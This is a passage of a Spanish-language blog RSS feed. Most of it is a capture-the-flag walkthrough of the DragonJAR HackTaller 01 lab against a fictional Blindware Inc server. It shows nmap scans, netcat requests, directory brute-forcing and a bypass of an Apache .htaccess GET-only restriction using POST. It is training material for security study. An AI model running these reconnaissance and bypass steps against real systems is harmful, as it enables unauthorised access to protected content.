<p>Para este primer anuncio del recurso prefiero citar una excelente guía a modo de introducción del tema, desarrollada por el Licenciado Cristian Borghello, seguido por unas definiciones básicas ofrecidas por la Wikipedia :</p>
<p><a href="http://www.segu-info.com.ar/criptologia/criptologia.htm" target="_blank"><strong>Criptología (Cristian Borghello)</strong></a></p>
<p><a href="http://es.wikipedia.org/wiki/Criptograf%C3%ADa" target="_blank"><strong>Definiciones</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/taller-tecnicas-criptograficas-introduccion-y-contenido/feed</wfw:commentRss>
		</item>
		<item>
		<title>HackTaller 01 disponible en Netmania Media Group</title>
		<link>http://labs.dragonjar.org/hacktaller-01-disponible-en-netmania-media-group</link>
		<comments>http://labs.dragonjar.org/hacktaller-01-disponible-en-netmania-media-group#comments</comments>
		<pubDate>Wed, 13 Aug 2008 18:41:44 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
		
		<category><![CDATA[DragoNLab-HackTaller]]></category>

		<category><![CDATA[Comunidad DragonJAR]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=82</guid>
		<description><![CDATA[<img src="http://img527.imageshack.us/img527/5823/icolabsrj4.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Después de llevar a cabo el <a href="http://labs.dragonjar.org/hacktaller-01-en-medellin-realizado" target="_blank">HackTaller 01</a> de la <a href="http://foro.dragonjar.us/" target="_blank">Comunidad DragonJAR</a>, se pone a disposición de los interesados el espacio ofrecido por <a href="http://www.netmaniavirtual.com/" target="_blank">Netmania Media Group</a>.</p>
<p style="text-align: center;"><img style="vertical-align: middle;" src="http://img161.imageshack.us/img161/4306/netmania1zd3.jpg" alt="" width="228" height="96" /></p>
<p style="text-align: justify;"><a href="http://www.netmaniavirtual.com/" target="_blank">Netmania Media Group</a> cuenta con los sistemas virtualizados de intrusión utilizados en el <a href="http://labs.dragonjar.org/hacktaller-01-en-medellin-realizado" target="_blank">HackTaller 01</a>, además encontrarás las herramientas y material bibliográfico necesario para llevar a cabo las prácticas del mismo.</p>
<p style="text-align: justify;">De esta manera quienes no pudieron asistir al Hacktaller 01 de la Comunidad pueden hacer uso del espacio y estar al día para los próximos Talleres de la Comunidad DragonJAR.</p>
<p style="text-align: justify;"><strong>Recuerda:</strong> Netmania Media Group está ubicado en <span>la calle 43 #68-60 local 104, Medellín tel 230-4308</span></p>
<p style="text-align: center;"><a href="http://img528.imageshack.us/img528/6034/netmania2px8.jpg" target="_blank"><img src="http://img528.imageshack.us/img528/6034/netmania2px8.th.jpg" alt="" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/hacktaller-01-disponible-en-netmania-media-group/feed</wfw:commentRss>
		</item>
		<item>
		<title>Solución del HackTaller 01 DragonJAR (III de VIII)</title>
		<link>http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-iii-de-viii</link>
		<comments>http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-iii-de-viii#comments</comments>
		<pubDate>Wed, 13 Aug 2008 18:38:36 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
		
		<category><![CDATA[DragoNLab-HackTaller]]></category>

		<category><![CDATA[.htaccess]]></category>

		<category><![CDATA[Apache]]></category>

		<category><![CDATA[Netcat]]></category>

		<category><![CDATA[Proxy]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=80</guid>
		<description><![CDATA[<img src="http://img527.imageshack.us/img527/5823/icolabsrj4.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Continuamos con la tercera entrega de la solución del HackTaller 01 de la Comunidad DragonJAR en formato de video.</p>
<p style="text-align: justify;">Este video tutorial fué desarrollado haciendo uso del solucionario en texto número 2 publicado por<a href="http://www.sg6.es/labs/" target="_blank"> <strong>SG6 Labs</strong></a>:</p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/50846686/95a4ef/H_ack_Taller_DragonJAR_SECGAME_03.html" target="_blank"><strong>Descargar video tutorial de resolución del HackTaller 01 de la Comunidad DragonJAR</strong></a> (SecGame: Sauron)(password: www.dragonjar.org)</p>
<p style="text-align: justify;"><strong>Herramientas necesarias:</strong></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/50821894/ef891491/nc11nt.html" target="_blank">NetCat</a></p>
<p style="text-align: justify;"><strong>Palabras claves (Documentos de interés, Definiciones):</strong></p>
<p style="text-align: justify;"><a href="http://es.wikipedia.org/wiki/Netcat" target="_blank">NetCat</a> - <a href="http://es.wikipedia.org/wiki/Servidor_web" target="_blank">Servidor Web</a> - <a href="http://es.wikipedia.org/wiki/Apache_http_server" target="_blank">Apache</a> - <a href="http://es.wikipedia.org/wiki/.php" target="_blank">PHP</a> - <a href="../laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-i" target="_blank">Vulnerabilidades</a> - <a href="http://extensionesfirefox.blogspot.com/2007/07/tamper-data-edita-cabeceras-html.html" target="_blank">Tamper Data</a> - <a href="http://es.wikipedia.org/wiki/Proxy" target="_blank">Proxy</a> - <a href="http://foros.hacktimes.com/?q=node/37" target="_blank">Paros Proxy</a> - <a href="http://es.wikipedia.org/wiki/Perl" target="_blank">Perl</a> - <a href="http://mundogeek.net/archivos/2005/05/04/htaccess/" target="_blank">.HTACCESS</a> - <a href="http://trevinca.ei.uvigo.es/%7Etxapi/espanol/proyecto/superior/memoria/node42.html" target="_blank">Peticiones</a></p>
<p style="text-align: justify;">Lo primero que corresponde es analizar el comportamiento de un acceso a dicho directorio bajo unos cuantos supuestos. Cada cual lo puede hacer como más le guste, desde Mozilla con Tamper Data, con un proxy intermedio como Paros, o directamente con un nc desde la línea de comandos, aquí usaremos esta última.</p>
<p style="text-align: justify;"><span id="more-80"></span><strong>&gt; nc www.blindware.inc 80</strong><br />
GET /data/stats HTTP/1.0</p>
<p>HTTP/1.1 302 Found<br />
Date: Tue, 17 Jul 2007 09:56:15 GMT<br />
Server: Apache/2.2.4 (Fedora)<br />
Location: http://www.blindware.inc/data/error-stats.html<br />
Content-Length: 312<br />
Connection: close<br />
Content-Type: text/html; charset=iso-8859-1</p>
<p><strong>&gt; nc www.blindware.inc 80</strong><br />
GET /data/stats/index.html HTTP/1.0</p>
<p>HTTP/1.1 302 Found<br />
Date: Tue, 17 Jul 2007 09:56:15 GMT<br />
Server: Apache/2.2.4 (Fedora)<br />
Location: http://www.blindware.inc/data/error-stats.html<br />
Content-Length: 312<br />
Connection: close<br />
Content-Type: text/html; charset=iso-8859-1</p>
<p><strong>&gt; nc www.blindware.inc 80</strong><br />
GET /data/stats/ficherocualquiera HTTP/1.0</p>
<p>HTTP/1.1 302 Found<br />
Date: Tue, 17 Jul 2007 09:56:15 GMT<br />
Server: Apache/2.2.4 (Fedora)<br />
Location: http://www.blindware.inc/data/error-stats.html<br />
Content-Length: 312<br />
Connection: close<br />
Content-Type: text/html; charset=iso-8859-1</p>
<p>Primera Idea: De esta primera prueba nos debemos percatar que incluso con ficheros aleatorios, cuya probabilidad de existir en esa ruta es prácticamente 0%, nos sigue dando la misma respuesta, por tanto podemos deducir que existe un control de acceso a ese directorio por parte del propio Apache, que fuerza una redirección a la URL: <strong>http://www.blindware.inc/data/error-stats.html</strong>, o dicho de otra forma, que solicitemos el fichero que solicitemos Apache nos va a mostrar la pagina de error-stats.html</p>
<p><strong>Visto esto, veámos que información da el “error-stats.html”:</strong></p>
<p>Access to “/var/www/blindware/htdocs/data/stats/” Forbidden<br />
Your access isn’t allowed to this path<br />
HTTP METHOD RESTRICTED TO 127.0.0.1</p>
<p>Esta web nos devuelve una información relevante sobre una denegación de acceso a la que somos redirigidos siempre, por tanto, y como consejo general a menos que estemos muy familiarizados con Apache, lo que haremos será documentar qué motivos pueden llevar a Apache a generar un mensaje de este tipo. Para ello bien nos puede servir buscar en Google: <a href="http://www.google.es/search?q=access+forbidden+apache" target="_blank">Access Forbidden Apache</a>. Leyendo por encima los enlaces que aparecen, encontraremos como información relevante que es un error de Apache numerado con el número 403 y que se produce bajo ciertas circunstancias:</p>
<ul>
<li>Solicitar un directorio que no contiene índice ( index.html ) cuando la opción INDEXES está desactivada.</li>
<li>Solicitar un directorio que tiene denegado el acceso bajo todas o alguna circunstancia.</li>
</ul>
<p style="text-align: justify;">Así mismo, vemos que mediante ficheros “<strong>.htaccess</strong>” o en la propia configuración de Apache, podemos configurar una directiva denominada ErrorDocument 403 que nos redirige a una página web concreta en caso de que se produzca un error 403. Es evidente, que en nuestro escenario no estamos solicitando un directorio que no contiene índice, sino que ante cualquier fichero que solicitemos, nos produce este resultado, por tanto, a priori, nos encontraremos en el caso en el que el directorio tiene denegado el acceso y se ha asociado una cláusula ErrorDocument a él.</p>
<p>Intentemos emular por tanto el escenario, y para ello qué mejor que dirigirse al howto para control de accesos que dispone Apache y ver qué habría que introducir en su configuración para obtener un comportamiento como el que vemos en este servidor. En esta web encontraremos algún que otro ejemplo, pero uno interesante por encima del resto:</p>
<p>Order deny,allow<br />
Deny from all<br />
Allow from W.X.Y.Z</p>
<p style="text-align: justify;">Segunda Idea: de lo anterior podemos inducir que bien una cláusula bien un fichero .htaccess dentro del directorio data/stats están limitando el acceso. Y que su estructura será parecida a la siguiente:</p>
<p>ErrorDocument 403 http://www.blindware.inc/data/error-stats.html<br />
Order deny,allow<br />
Deny from all<br />
Allow from 127.0.0.1</p>
<p>La primera línea es la que marca la redirección al fichero “error-stats.html” en caso de que se produzca un acceso no autorizado. Así mismo, la cláusula “Deny from all” deniega el acceso a todos los usuarios menos a los autorizados por una cláusula “Allow” que en este caso serán los provenientes de 127.0.0.1 (localhost).</p>
<p>Con esto hemos replicado el comportamiento del escenario del nivel, ¿qué podemos hacer ahora?. Siempre tenemos 2 opciones una vez hemos conseguido conocer la estructura y replicarla bajo nuestro total control: buscar una vulnerabilidad pública o descubrirla por nosotros mismos. Desde aquí recomendamos encarecidamente el no reinventar la rueda: las listas públicas de vulnerabilidades existen para algo y es para ser usadas. Es cierto, que no siempre las vulnerabilidades existentes, y los exploits desarrollados para ellas se adaptarán 100% a nuestras necesidades, pero con diferencia nos ahorrarán mucho trabajo. Por ello, para sobrepasar esta medida de protección recomendamos buscar en Google etiquetas como las siguientes: <a href="http://www.google.es/search?q=apache+access+bypass" target="_blank">apache access bypass</a>, <a href="http://www.google.es/search?q=htaccess+bypass" target="_blank">htaccess bypass</a>, o <a href="http://www.google.es/search?q=apache+access+weakness" target="_blank">apache access weakness</a>.</p>
<p>Estas búsquedas nos devolverán un importante número de referencias a vulnerabilidades públicas en el control de accesos por parte de Apache (<a href="http://www.securityfocus.com/bid/9874" target="_blank">R1</a>, <a href="http://httpd.apache.org/docs/2.0/es/howto/auth.html" target="_blank">R2</a>).</p>
<p>De la lectura de estas fuentes, podemos suponer que es posbile que exista una vulnerabilidad de configuración en el escenario propuesto para la segunda idea. ¿Cuál sería esta vulnerabilidad? Por ejemplo, una configuración como la siguiente:</p>
<p>ErrorDocument 403 http://www.blindware.inc/data/error-stats.html<br />
&lt;LIMIT GET&gt;<br />
Order deny,allow<br />
Deny from all<br />
Allow from 127.0.0.1<br />
&lt;/LIMIT&gt;</p>
<p>Para verificarlo volvemos a hacer uso de nc desde la línea de comandos.</p>
<p><strong>&gt; nc www.blindware.inc 80</strong><br />
OPTIONS /data/stats/ HTTP/1.0</p>
<p>HTTP/1.1 200 OK<br />
Date: Tue, 17 Jul 2007 12:29:51 GMT<br />
Server: Apache/2.2.4 (Fedora)<br />
Allow: GET,HEAD,POST,OPTIONS,TRACE<br />
Content-Length: 0<br />
Connection: close<br />
Content-Type: text/html; charset=UTF-8</p>
<p><strong>&gt; nc www.blindware.inc 80</strong><br />
TRACE /data/stats/ HTTP/1.0</p>
<p>HTTP/1.1 200 OK<br />
Date: Tue, 17 Jul 2007 12:30:19 GMT<br />
Server: Apache/2.2.4 (Fedora)<br />
Connection: close<br />
Content-Type: message/http</p>
<p>TRACE /data/stats/ HTTP/1.0</p>
<p><strong>&gt; nc www.blindware.inc 80</strong><br />
PUT /data/stats/ HTTP/1.0</p>
<p>HTTP/1.1 405 Method Not Allowed<br />
Date: Tue, 17 Jul 2007 12:30:49 GMT<br />
Server: Apache/2.2.4 (Fedora)<br />
Allow: GET,HEAD,POST,OPTIONS,TRACE<br />
Content-Length: 324<br />
Connection: close<br />
Content-Type: text/html; charset=iso-8859-1</p>
<p>Efectivamente, existe una configuración incorrecta. Con sólo leer las respuestas del servidor vemos cómo únicamente es filtrado el método GET, mientras que por el contrario el método OPTIONS, TRACE o PUT son correctamente procesados por Apache. ¿Cómo se puede explotar esto?.</p>
<p>La explotación de este fallo de seguridad depende del fichero sobre el que hagamos la petición, en caso de ser un fichero procesable por un módulo de Apache, como puede ser PHP, PERL, etc, la explotación es mucho más sencilla porque los metodos OPTIONS o PUT devolverán exactamente lo mismo que un método GET en la inmensa mayoría de las ocasiones. Sin embargo, si el fichero lo procesa directamente Apache, como es el caso de los ficheros HTML con contenido estático, el único método diferente a GET que tiene el mismo resultado es POST. Por tanto, y dado que en este caso parece que lo que estamos buscando es el fichero “index.html” debemos hacer uso del método POST.</p>
<p><strong>&gt; nc www.blindware.inc 80</strong><br />
POST /data/stats/ HTTP/1.0</p>
<p>HTTP/1.1 200 OK<br />
Date: Tue, 17 Jul 2007 12:31:57 GMT<br />
Server: Apache/2.2.4 (Fedora)<br />
Last-Modified: Tue, 08 May 2007 20:46:48 GMT<br />
ETag: “a8023-4eed-8431de00?<br />
Accept-Ranges: bytes<br />
Content-Length: 20205<br />
Connection: close<br />
Content-Type: text/html; charset=UTF-8<br />
&lt;html&gt;<br />
&lt;head&gt;<br />
&lt;title&gt;Web Server Statistics for Blindware Inc.&lt;/title&gt;<br />
&lt;meta http-equiv=”Content-Type” content=”text/html; charset=ISO-8859-1? /&gt;<br />
&lt;meta name=”robots” content=”noindex,nofollow” /&gt;<br />
&lt;title&gt;Server Statistics for Blindware Inc.&lt;/title&gt;(..)</p>
<p>Efectivamente, nos devuelve el fichero index.html de forma correcta, por tanto podemos salvarlo a un fichero y leerlo localmente con cualquier navegador, viendo entre otros los siguientes datos:</p>
<p><strong>Directory Report</strong></p>
<p>This report lists the directories from which files were requested. (The figures for each directory include all of its subdirectories.)</p>
<p><strong>/web/<br />
[root directory]<br />
/data/<br />
/icons/<br />
/_controlp/</strong></p>
<p>En la sección destinada a directorios accedidos encontramos un directorio en el que no habíamos reparado y de nombre “_controlp/”.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-iii-de-viii/feed</wfw:commentRss>
		</item>
		<item>
		<title>Solución del HackTaller 01 DragonJAR (II de VIII)</title>
		<link>http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-ii-de-viii</link>
		<comments>http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-ii-de-viii#comments</comments>
		<pubDate>Wed, 13 Aug 2008 18:36:33 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
		
		<category><![CDATA[DragoNLab-HackTaller]]></category>

		<category><![CDATA[Apache]]></category>

		<category><![CDATA[Logs]]></category>

		<category><![CDATA[Netcat]]></category>

		<category><![CDATA[Nmap]]></category>

		<category><![CDATA[PHP]]></category>

		<category><![CDATA[Puertos]]></category>

		<category><![CDATA[Vulnerabilidades]]></category>

		<category><![CDATA[Wget]]></category>

		<category><![CDATA[Wikto]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=78</guid>
		<description><![CDATA[<img src="http://img527.imageshack.us/img527/5823/icolabsrj4.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Continuamos con la segunda entrega de la solución del HackTaller 01 de la Comunidad DragonJAR en formato de video.</p>
<p style="text-align: justify;">Este video tutorial fué desarrollado haciendo uso del solucionario en texto número 1 publicado por<a href="http://www.sg6.es/labs/" target="_blank"> <strong>SG6 Labs</strong></a>:</p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/50821791/94bfa723/H_ack_Taller_DragonJAR_SECGAME_02.html" target="_blank"><strong>Descargar video tutorial de resolución del HackTaller 01 de la Comunidad DragonJAR</strong></a> (SecGame: Sauron)(password: www.dragonjar.org)</p>
<p style="text-align: justify;"><strong>Herramientas necesarias:</strong></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/50821894/ef891491/nc11nt.html" target="_blank">NetCat</a><br />
<a href="http://www.4shared.com/file/50822044/4681948a/nmap-465-setup.html" target="_blank">Nmap</a><br />
<a href="http://www.4shared.com/file/50822127/88100881/wikto_v202924-24997.html" target="_blank">Wikto</a><br />
<a href="http://www.4shared.com/file/50822071/1dc633c6/wgetwin-1_5_3_1-binary.html" target="_blank">Wget</a><br />
<a href="http://www.4shared.com/file/50825998/689fa5da/dotnetfx.html" target="_blank">.Net Framework 2.0</a></p>
<p style="text-align: justify;"><strong>Palabras claves (Documentos de interés, Definiciones):</strong></p>
<p style="text-align: justify;"><a href="http://es.wikipedia.org/wiki/Nmap" target="_blank">Nmap</a> - <a href="http://es.wikipedia.org/wiki/Netcat" target="_blank">NetCat</a> - <a href="http://www.baxware.com/wikto.htm" target="_blank">Wikto</a> - <a href="http://es.wikipedia.org/wiki/Wget" target="_blank">Wget</a> - <a href="http://es.wikipedia.org/wiki/.NET_Framework" target="_blank">.Net Framework</a> - <a href="http://es.wikipedia.org/wiki/ICMP" target="_blank">ICMP</a> - <a href="http://www.info-ip.net/ip/Clases-de-direcciones-IP.php" target="_blank">Clases de redes</a> - <a href="http://es.wikipedia.org/wiki/Ping" target="_blank">Ping</a> - <a href="http://es.wikipedia.org/wiki/Puerto_%28computaci%C3%B3n%29" target="_blank">Puertos</a> - <a href="http://es.wikipedia.org/wiki/Subred" target="_blank">Subred</a> - <a href="../laboratorios-hacking-tecnicas-y-contramedidas-scanning-i" target="_blank">Escaneo</a> - <a href="http://es.wikipedia.org/wiki/Servidor_web" target="_blank">Servidor Web</a> - <a href="http://es.wikipedia.org/wiki/Apache_http_server" target="_blank">Apache</a> - <a href="http://es.wikipedia.org/wiki/.php" target="_blank">PHP</a> - <a href="../laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-i" target="_blank">Vulnerabilidades</a> - <a href="http://es.wikipedia.org/wiki/JavaScript" target="_blank">JavaScript</a> - <a href="http://es.wikipedia.org/wiki/HTTP" target="_blank">HTTP</a> - <a href="http://www.webtaller.com/google/guia_robots.php" target="_blank">Robots.txt</a> - <a href="http://www.wikilearning.com/monografia/control_administracion_e_integridad_de_logs-que_es_un_log/3485-2" target="_blank">Logs</a></p>
<p style="text-align: justify;">En este primer nivel, que sirve como toma de contacto con el modelo de resolución, lo primero que haremos será marcar unos objetivos principales, que bien podrán servir tanto para afrontar este reto, como en general para el inicio de cualquier actividad que tenga como finalidad determinar posibles puntos de intrusión en un sistema.</p>
<p><span id="more-78"></span><strong>Los objetivos son los siguientes:</strong></p>
<ul style="text-align: justify;">
<li>Conocer la estructura del sistema y de la red</li>
<li>Conocer la estructura del aplicativo</li>
<li>Buscar ficheros por defecto con información sensible</li>
<li>Analizar la lógica del aplicativo</li>
<li>Determinar los posibles puntos de intrusión</li>
<li>Información sobre Red y Servicios</li>
</ul>
<p>Vamos a comenzar delimitando los sistemas presentes en la red de clase C 192.168.200.0/24 . Para hacerlo, usamos nmap con su modificador –sP ( ICMP Ping ), aunque bien se puede dar la circunstancia de existir sistemas que no contesten a tráfico ICMP.</p>
<p style="text-align: justify;"><strong>&gt; nmap -sP 192.168.200.1-254</strong></p>
<p><em>Starting Nmap 4.20 ( http://insecure.org ) at 2007-07-05 18:51 Hora estandar romance<br />
Host 192.168.200.1 appears to be up.<br />
Host www.blindware.inc (192.168.200.2) appears to be up.<br />
MAC Address: 52:54:00:12:34:55 (QEMU virtual NIC)<br />
Nmap finished: 254 IP addresses (2 hosts up) scanned in 17.016 seconds</em></p>
<p>Por ello, una comprobación también es interesante es verificar directamente algunos puertos típicos, haciendo uso de tráfico TCP, sin usar comprobación previa por ICMP. Por ejemplo lo podemos hacer con el modificador –P0 –p 80, indicando así que no se envíe un “ping” previo, y que se compruebe el puerto 80/tcp.</p>
<p>En nuestro caso concreto, y dado que directamente parece que no existe ningún otro host activo en esa subred, escanearemos la IP 192.168.200.2. Podremos escanear por defecto, eliminando el modificador “-p”, algunos puertos concretos o escanearlos todos “-p 1-65535”. Un detalle importante que siempre debemos recordar es que cuando marcamos un escaneo –sS o –sT, o sin tipo, únicamente escaneamos puertos TCP, los puertos UDP deben escanearse con el modificador –sU. En nuestro caso este ha sido el resultado.</p>
<p><strong>&gt; nmap -P0 -sS -p 22,23,25,80,110,443,3306 192.168.200.2</strong></p>
<p><em>Starting Nmap 4.20 ( http://insecure.org ) at 2007-07-05 19:02 Hora estßndar romance<br />
Interesting ports on www.blindware.inc (192.168.200.2):<br />
PORT STATE SERVICE<br />
22/tcp filtered ssh<br />
23/tcp filtered telnet<br />
25/tcp filtered smtp<br />
80/tcp open http<br />
110/tcp filtered pop3<br />
443/tcp open https<br />
3306/tcp filtered mysql<br />
MAC Address: 52:54:00:12:34:55 (QEMU virtual NIC)</em></p>
<p>Nmap finished: 1 IP address (1 host up) scanned in 0.360 seconds</p>
<p>De esta verificación obtenemos que existen 2 puertos abiertos en ese sistema: 80 y 443, en un principio coorrespondientes a tráfico http y https. Existe otro modificador que nos puede dar más información sobre estos puertos: –sV</p>
<p><strong>&gt; nmap -sV -p 80,443 192.168.200.2</strong></p>
<p><em>Starting Nmap 4.20 ( http://insecure.org ) at 2007-07-05 19:14 Hora estandar romance<br />
Interesting ports on www.blindware.inc (192.168.200.2):<br />
PORT STATE SERVICE VERSION<br />
80/tcp open http Apache httpd 2.2.4 ((Fedora))<br />
443/tcp open ssl OpenSSL<br />
MAC Address: 52:54:00:12:34:55 (QEMU virtual NIC)</em></p>
<p>Nmap finished: 1 IP address (1 host up) scanned in 6.719 seconds</p>
<p>Llegados a este punto, podemos decir que si bien podemos seguir haciendo un uso más intensivo de herramientas de red, para nuestros propósitos hemos conseguido establecer la existencia de un sistema activo en la subred determinada, el cual cuenta con 2 puertos TCP abiertos, sobre los que ofrece servicio http y https.</p>
<p><strong>Información sobre el Servidor Web</strong></p>
<p>¿Cuál es nuestro segundo objetivo? Como dijimos inicialmente, familiarizarnos con toda la estructura del aplicativo web. ¿Por qué? Primero, porque en el sistema activo para la subred 192.168.200.0/24, no parecen existir otro tipo de servicios. Además de ello, debemos tener muy presente, que en la actualidad y de forma mayoritaria, la inseguridad se ha ido desplazando desde los servicios y elementos de red, a las aplicaciones web sobre el servicio http/https. Por tanto, a pesar de que pudieran existir otros servicios, sobre el aplicativo web, siempre que exista, incidiremos con especial detalle.</p>
<p>Una conexión directa haciendo uso de netcat, y una petición al servicio web nos muestra la siguiente información:</p>
<p><strong>&gt; nc 192.168.200.2 80<br />
HEAD / HTTP/1.0</strong></p>
<p><em>HTTP/1.1 200 OK<br />
Date: Thu, 05 Jul 2007 19:20:20 GMT<br />
Server: Apache/2.2.4 (Fedora)<br />
X-Powered-By: PHP/5.1.6<br />
Connection: close<br />
Content-Type: text/html; charset=UTF-8</em></p>
<p>A todos los efectos, esto nos sirve para comprobar que se tratan de versiones actualizadas de Apache y de PHP y que por tanto, las vulnerabilidades existentes, como suele ser común, no residen en los servicios de red, sino que deberemos buscarlas dentro del aplicativo web.</p>
<p>Lo siguiente que debemos hacer es obtener información sobre el árbol web. Desde aquí recomendamos que el spidering ( nombre que comúnmente recibe esta técnica ) se realice sin usar aplicativos integrados en el navegador, pues algunos tienen la mala costumbre de interpretar código javascript pudiendo hacer que obviemos detalles importantes debido a la automatización del proceso. Wget o httrack son unas herramientas muy válidas para la tarea.</p>
<p><strong>&gt; wget -r http://www.blindware.inc</strong><br />
–19:28:15– http://www.blindware.inc/<br />
=&gt; `www.blindware.inc/index.html’<br />
Resolving www.blindware.inc… 192.168.200.2<br />
Connecting to www.blindware.inc|192.168.200.2|:80… connected.<br />
HTTP request sent, awaiting response… 200 OK<br />
Length: unspecified [text/html]</p>
<p>[ &lt;=&gt; ] 24 –.–K/s</p>
<p>19:28:15 (1.02 MB/s) - `www.blindware.inc/index.html’ saved [24]</p>
<p>Loading robots.txt; please ignore errors.<br />
–19:28:15– http://www.blindware.inc/robots.txt<br />
=&gt; `www.blindware.inc/robots.txt’<br />
Connecting to www.blindware.inc|192.168.200.2|:80… connected.<br />
HTTP request sent, awaiting response… 200 OK<br />
Length: 33 [text/plain]</p>
<p>100%[====================================&gt;] 33 –.–K/s</p>
<p>19:28:15 (1.12 MB/s) - `www.blindware.inc/robots.txt’ saved [33/33]</p>
<p>–19:28:15– http://www.blindware.inc/load.js<br />
=&gt; `www.blindware.inc/load.js’<br />
Connecting to www.blindware.inc|192.168.200.2|:80… connected.<br />
HTTP request sent, awaiting response… 200 OK<br />
Length: 76 [application/x-javascript]</p>
<p>100%[====================================&gt;] 76 –.–K/s</p>
<p>19:28:15 (2.30 MB/s) - `www.blindware.inc/load.js’ saved [76/76]</p>
<p>FINISHED –19:28:15–<br />
Downloaded: 133 bytes in 3 files</p>
<p>Ese es el resultado inicial para http://www.blindware.inc. Si lo repetimos sobre http://intranet.blindware.inc no obtendremos nada porque nos pide autenticación, y por el momento la desconocemos. Por último, si lo llevamos a cabo sobre el servicio HTTPS, https://www.blindware.inc o https://intranet.blindware.inc obtenemos un index.html en blanco.</p>
<p>De esto concluimos que, al menos, se están sirviendo 3 escenarios diferentes. Uno por HTTP para www.blindware.inc, otro por HTTP para intranet.blindware.inc y por último, lo que parece uno común por HTTPS que sirve un index.html en blanco.</p>
<p><strong>Vamos a verificar qué contienen los ficheros descargados:</strong></p>
<p><strong>&gt; type index.html</strong><br />
script src=”load.js”&gt;</p>
<p><strong>&gt; type load.js</strong><br />
// document.location.href=’data/0.html’<br />
Document.location.href=’web/0.html’;</p>
<p><strong>&gt; type robots.txt</strong><br />
User-agent: *<br />
Disallow: /data/</p>
<p>Como podemos comprobar desde el fichero index.html existe una llamada a un fichero con contenido javascript (load.js) el cual tiene como misión redirigir el tráfico hacia la web principal. Nos debemos percatar, que existe una línea comentada dentro de este fichero, la cual nos da información sobre una ruta diferente a la habitual data/0.html. Así mismo dentro del fichero robots.txt volvemos a encontrar una referencia a esta ruta. Si continuamos descargando contenidos desde web/0.html comprobamos que únicamente se descarga contenido estático en html.</p>
<p>Así que hasta el momento, y como conclusión, sabemos que existe una carpeta web/, la cual no parece contener nada reseñable, más que el contenido estático del site, y la carpeta data/, sobre la cual hablaremos más adelante.</p>
<p><strong>Vulnerabilidades y Ficheros Sensibles</strong></p>
<p>A continuación, debemos determinar ficheros, configuraciones, o posibles fallos conocidos en el servicio web. Para esta tarea existen numerosas aplicaciones, desde AppScan, a Nikto, o su port a Win32, Wikto. Nosotros vamos a utilizar este último, concretamente sus funciones destinadas a la exploración de contenido backend, cuya finalidad es extraer mediante una exploración por diccionario carpetas y ficheros ocultos, así como la propia utilidad Nikto, que nos escaneará la web buscando vulnerabilidades conocidas. Advertencia: El uso de herramientas automatizadas puede provocar falsos positivos, que debemos comprobar antes de emitir cualquier tipo de valoración.</p>
<p><strong>Los resultados de la ejecución de Wikto son los siguientes:</strong></p>
<p><strong>BackEnd</strong></p>
<p><strong>#Directories</strong><br />
www.blindware.inc/<br />
www.blindware.inc/cgi-bin/<br />
www.blindware.inc/data/<br />
www.blindware.inc/error/<br />
www.blindware.inc/data/stats/<br />
www.blindware.inc/error/include/<br />
<strong>#Indexable</strong><br />
www.blindware.inc/data/<br />
<strong>#Files</strong><br />
www.blindware.inc/index.php<br />
www.blindware.inc/robots.txt</p>
<p><strong>Nikto</strong></p>
<p>/index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000<br />
/index.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42<br />
/index.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42<br />
/WS_FTP.LOG</p>
<p><strong>De esta información podemos obtener los siguientes datos relevantes:</strong></p>
<ul style="text-align: justify;">
<li>La existencia de un directorio /data/stats</li>
<li>La existencia de un fichero WS_FTP.LOG</li>
<li>La existencia de un fichero robots.txt</li>
<li>Información sobre PHP</li>
</ul>
<p style="text-align: justify;">Un paseo por la aplicación visible, podemos hacerlo con Paros por ejemplo, nos desvela que, a priori, los que vemos es un contenido pre-generado de forma estática y cuya única entrada de datos se encuentra en el formulario contacto. Podemos analizarlo, pero no vamos a encontrar ningún comportamiento anómalo, ya que si nos damos cuenta el campo “action” de ese formulario va en blanco. Esto nos debe hacer pensar, que en caso de existir partes vulnerables, no se encuentran accesibles al público directamente.</p>
<p>Como información adicional decir que muchos gestores de contenido, entre ellos los más robustos, generan el contenido de forma estática desde un aplicativo en backend, haciendo que la parte visible de la aplicación carezca, casi por completo, de contenido dinámico, y de entradas por parte del usuario. Existirán por el contrario, otros aplicativos, como foros, buscadores, o secciones de prensa, cuyo contenido utilice generación dinámica. En estos casos, deberemos probar la inclusión sobre sus parámetros de código SQL, código HTML, código PHP, etc. buscando un comportamiento extraño.</p>
<p><strong>Busqueda de un Punto de Intrusión</strong></p>
<p>Para buscar un punto de intrusión, debemos recopilar lo que sabemos hasta el momento, ordenar las ideas y tomar una decisión, que vaya por delante, no tiene porqué ser la correcta. Dicho de otra forma, todo lo realizado hasta el momento nos lleva a suposiciones plausibles, pero nada nos garantiza que estemos en lo cierto. Vamos a ver lo que sabemos:</p>
<p><strong>1. </strong>Existen 3 contenidos diferentes servidos por el servidor web<br />
<strong>1. </strong>http://www.blindware.inc ( En adelante www )<br />
